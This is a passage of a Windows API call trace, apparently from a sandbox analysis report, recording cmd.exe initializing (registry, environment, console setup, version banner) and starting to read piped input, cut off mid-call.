__alignment1=0xffffb203, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0288.219] VirtualQuery (in: lpAddress=0x202eee4000, lpBuffer=0x202efdfa00, dwLength=0x30 | out: lpBuffer=0x202efdfa00*(BaseAddress=0x202eee4000, AllocationBase=0x202eee0000, AllocationProtect=0x4, __alignment1=0xffffb203, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0288.219] VirtualQuery (in: lpAddress=0x202efe0000, lpBuffer=0x202efdfa00, dwLength=0x30 | out: lpBuffer=0x202efdfa00*(BaseAddress=0x202efe0000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xffffb203, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0288.219] GetConsoleOutputCP () returned 0x1b5 [0288.679] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7dbbafbb0 | out: lpCPInfo=0x7ff7dbbafbb0) returned 1 [0288.680] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7dbb98150, Add=1) returned 1 [0288.680] _get_osfhandle (_FileHandle=1) returned 0x254 [0288.680] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff7dbbafc04 | out: lpMode=0x7ff7dbbafc04) returned 0 [0288.680] _get_osfhandle (_FileHandle=0) returned 0x248 [0288.680] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff7dbbafc00 | out: lpMode=0x7ff7dbbafc00) returned 0 [0288.680] _get_osfhandle (_FileHandle=1) returned 0x254 [0288.680] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0288.680] _get_osfhandle (_FileHandle=1) returned 0x254 [0288.680] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff7dbbafc08 | out: lpMode=0x7ff7dbbafc08) returned 0 [0288.680] _get_osfhandle (_FileHandle=0) returned 0x248 [0288.680] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff7dbbafc0c | out: lpMode=0x7ff7dbbafc0c) returned 0 [0288.681] GetEnvironmentStringsW () returned 0x1b843bf5a40* [0288.681] GetProcessHeap () returned 0x1b843bf0000 [0288.681] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xab6) returned 0x1b843bf6500 [0288.681] FreeEnvironmentStringsA (penv="=") returned 1 [0288.681] GetProcessHeap () returned 0x1b843bf0000 [0288.681] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x8) returned 0x1b843bf5a40 [0288.681] GetEnvironmentStringsW () returned 0x1b843bf6fd0* [0288.682] GetProcessHeap () returned 0x1b843bf0000 [0288.682] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xab6) returned 0x1b843bf7a90 [0288.682] FreeEnvironmentStringsA (penv="=") returned 1 [0288.682] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x202efde948 | out: phkResult=0x202efde948*=0x7c) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x0, lpData=0x202efde960*=0x4, lpcbData=0x202efde944*=0x1000) returned 0x2 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x1, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x0, lpData=0x202efde960*=0x1, lpcbData=0x202efde944*=0x1000) returned 0x2 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x0, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x40, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x40, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x0, lpData=0x202efde960*=0x40, lpcbData=0x202efde944*=0x1000) returned 0x2 [0288.683] RegCloseKey (hKey=0x7c) returned 0x0 [0288.683] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x202efde948 | out: phkResult=0x202efde948*=0x7c) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x0, lpData=0x202efde960*=0x40, lpcbData=0x202efde944*=0x1000) returned 0x2 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x1, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x0, lpData=0x202efde960*=0x1, lpcbData=0x202efde944*=0x1000) returned 0x2 [0288.683] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x0, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.684] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x9, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.684] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x4, lpData=0x202efde960*=0x9, lpcbData=0x202efde944*=0x4) returned 0x0 [0288.684] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x202efde940, lpData=0x202efde960, lpcbData=0x202efde944*=0x1000 | out: lpType=0x202efde940*=0x0, lpData=0x202efde960*=0x9, lpcbData=0x202efde944*=0x1000) returned 0x2 [0288.684] RegCloseKey (hKey=0x7c) returned 0x0 [0288.684] time (in: timer=0x0 | out: timer=0x0) returned 0x5e86dfce [0288.684] srand (_Seed=0x5e86dfce) [0288.684] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0288.684] malloc (_Size=0x4000) returned 0x1b843f05530 [0288.685] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0288.685] malloc (_Size=0xffce) returned 0x1b843dc0080 [0288.686] ??_V@YAXPEAX@Z () returned 0x1b843dc0080 [0288.687] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1b843dc0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0288.688] malloc (_Size=0xffce) returned 0x1b843dd0060 [0288.688] ??_V@YAXPEAX@Z () returned 0x1b843dd0060 [0288.707] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b843dd0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0288.707] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0288.707] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0288.707] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0288.707] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0288.708] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0288.708] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0288.708] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0288.708] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0288.708] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0288.708] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0288.708] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0288.708] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0288.708] GetProcessHeap () returned 0x1b843bf0000 [0288.708] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf6500) returned 1 [0288.708] GetEnvironmentStringsW () returned 0x1b843bf5a60* [0288.708] GetProcessHeap () returned 0x1b843bf0000 [0288.708] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xace) returned 0x1b843bf6540 [0288.709] FreeEnvironmentStringsA (penv="=") returned 1 [0288.709] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0288.709] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0288.709] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0288.709] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0288.709] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0288.709] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0288.709] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0288.709] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0288.709] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0288.709] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0288.709] malloc (_Size=0xffce) returned 0x1b843de0040 [0288.710] ??_V@YAXPEAX@Z () returned 0x1b843de0040 [0288.711] GetProcessHeap () returned 0x1b843bf0000 [0288.711] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x38) returned 0x1b843bf8580 [0288.711] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1b843de0040 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0288.711] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x1b843de0040, lpFilePart=0x202efdf4c0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x202efdf4c0*="system32") returned 0x13 [0288.712] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0288.713] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x202efdf1f0 | out: lpFindFileData=0x202efdf1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x1b843bf85c0 [0288.713] FindClose (in: hFindFile=0x1b843bf85c0 | out: hFindFile=0x1b843bf85c0) returned 1 [0288.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x202efdf1f0 | out: lpFindFileData=0x202efdf1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x52ab301c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x52ab301c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x1b843bf85c0 [0288.713] FindClose (in: hFindFile=0x1b843bf85c0 | out: hFindFile=0x1b843bf85c0) returned 1 [0288.714] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0288.714] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0288.714] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0288.714] GetProcessHeap () returned 0x1b843bf0000 [0288.714] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf6540) returned 1 [0288.714] GetEnvironmentStringsW () returned 0x1b843bf5a60* [0288.714] GetProcessHeap () returned 0x1b843bf0000 [0288.714] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xafe) returned 0x1b843bf6570 [0288.714] FreeEnvironmentStringsA (penv="=") returned 1 [0288.714] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1b843dc0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0288.714] GetProcessHeap () returned 0x1b843bf0000 [0288.714] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf8580) returned 1 [0288.714] ??_V@YAXPEAX@Z () returned 0x1 [0288.714] ??_V@YAXPEAX@Z () returned 0x1 [0288.714] GetProcessHeap () returned 0x1b843bf0000 [0288.714] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x4016) returned 0x1b843bf8580 [0288.715] GetProcessHeap () returned 0x1b843bf0000 [0288.715] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf8580) returned 1 [0288.715] GetConsoleOutputCP () returned 0x1b5 [0289.789] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7dbbafbb0 | out: lpCPInfo=0x7ff7dbbafbb0) returned 1 [0289.789] GetUserDefaultLCID () returned 0x409 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff7dbbabb78, cchData=8 | out: lpLCData=":") returned 2 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x202efdf880, cchData=128 | out: lpLCData="0") returned 2 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x202efdf880, cchData=128 | out: lpLCData="0") returned 2 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x202efdf880, cchData=128 | out: lpLCData="1") returned 2 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff7dbbabb68, cchData=8 | out: lpLCData="/") returned 2 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff7dbbabb00, cchData=32 | out: lpLCData="Mon") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff7dbbabac0, cchData=32 | out: lpLCData="Tue") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff7dbbaba80, cchData=32 | out: lpLCData="Wed") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff7dbbaba40, cchData=32 | out: lpLCData="Thu") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff7dbbaba00, cchData=32 | out: lpLCData="Fri") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff7dbbab9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff7dbbab980, cchData=32 | out: lpLCData="Sun") returned 4 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff7dbbabb58, cchData=8 | out: lpLCData=".") returned 2 [0289.790] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff7dbbabb40, cchData=8 | out: lpLCData=",") returned 2 [0289.790] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0289.793] GetProcessHeap () returned 0x1b843bf0000 [0289.793] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x0, Size=0x20c) returned 0x1b843bf70f0 [0289.793] GetConsoleTitleW (in: lpConsoleTitle=0x1b843bf70f0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0290.574] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.574] GetFileType (hFile=0x254) returned 0x3 [0290.584] ApiSetQueryApiSetPresence () returned 0x0 [0290.585] ResolveDelayLoadedAPI () returned 0x7ffb3474d990 [0290.600] BrandingFormatString () returned 0x1b843bf75e0 [0290.612] GetVersion () returned 0x3ad7000a [0290.613] _vsnwprintf (in: _Buffer=0x202efdf9e0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x202efdf978 | out: _Buffer="10.0.15063") returned 10 [0290.613] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.613] GetFileType (hFile=0x254) returned 0x3 [0290.613] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff7dbbb7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0290.614] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff7dbbb7f60, nSize=0x2000, Arguments=0x202efdf980 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0290.614] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.614] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0290.614] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x202efdf8d8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf8d8*=0x26, lpOverlapped=0x0) returned 1 [0290.614] _vsnwprintf (in: _Buffer=0x7ff7dbbb7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x202efdf9a8 | out: _Buffer="\r\n") returned 2 [0290.614] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.615] GetFileType (hFile=0x254) returned 0x3 [0290.615] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.615] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0290.615] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x202efdf978, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf978*=0x2, lpOverlapped=0x0) returned 1 [0290.615] _vsnwprintf (in: _Buffer=0x7ff7dbbb7f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x202efdf9a8 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0290.615] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.615] GetFileType (hFile=0x254) returned 0x3 [0290.615] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.615] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0290.615] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x202efdf978, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf978*=0x34, lpOverlapped=0x0) returned 1 [0290.615] _vsnwprintf (in: _Buffer=0x7ff7dbbb7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x202efdf9a8 | out: _Buffer="\r\n") returned 2 [0290.615] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.615] GetFileType (hFile=0x254) returned 0x3 [0290.615] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.615] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0290.615] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x202efdf978, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf978*=0x2, lpOverlapped=0x0) returned 1 [0290.616] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffb3c210000 [0290.616] GetProcAddress (hModule=0x7ffb3c210000, lpProcName="CopyFileExW") returned 0x7ffb3c22e830 [0290.616] GetProcAddress (hModule=0x7ffb3c210000, lpProcName="IsDebuggerPresent") returned 0x7ffb3c22e300 [0290.616] GetProcAddress (hModule=0x7ffb3c210000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffb395f0a40 [0290.616] ??_V@YAXPEAX@Z () returned 0x1 [0290.617] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.617] GetFileType (hFile=0x248) returned 0x3 [0290.617] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0290.617] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x202efdf7e8 | out: TokenHandle=0x202efdf7e8*=0x0) returned 0xc000007c [0290.617] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x202efdf7e8 | out: TokenHandle=0x202efdf7e8*=0x98) returned 0x0 [0290.617] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x12, TokenInformation=0x202efdf798, TokenInformationLength=0x4, ReturnLength=0x202efdf7a0 | out: TokenInformation=0x202efdf798, ReturnLength=0x202efdf7a0) returned 0x0 [0290.619] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x1a, TokenInformation=0x202efdf7a0, TokenInformationLength=0x4, ReturnLength=0x202efdf798 | out: TokenInformation=0x202efdf7a0, ReturnLength=0x202efdf798) returned 0x0 [0290.619] NtClose (Handle=0x98) returned 0x0 [0290.780] _vsnwprintf (in: _Buffer=0x7ff7dbbb7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x202efdf628 | out: _Buffer="\r\n") returned 2 [0290.781] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.781] GetFileType (hFile=0x254) returned 0x3 [0290.781] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.781] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0290.781] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x202efdf5f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf5f8*=0x2, lpOverlapped=0x0) returned 1 [0290.781] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0290.781] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1b843dc0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0290.781] malloc (_Size=0x107ce) returned 0x1b843dd0060 [0290.782] _vsnwprintf (in: _Buffer=0x1b843dd0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x202efdf638 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0290.782] _vsnwprintf (in: _Buffer=0x1b843dd0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x202efdf638 | out: _Buffer=">") returned 1 [0290.782] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.782] GetFileType (hFile=0x254) returned 0x3 [0290.782] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.782] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0290.782] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x202efdf628, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf628*=0x14, lpOverlapped=0x0) returned 1 [0290.782] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.782] GetFileType (hFile=0x248) returned 0x3 [0290.783] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.783] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.783] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c30, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0290.783] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.783] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.783] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, 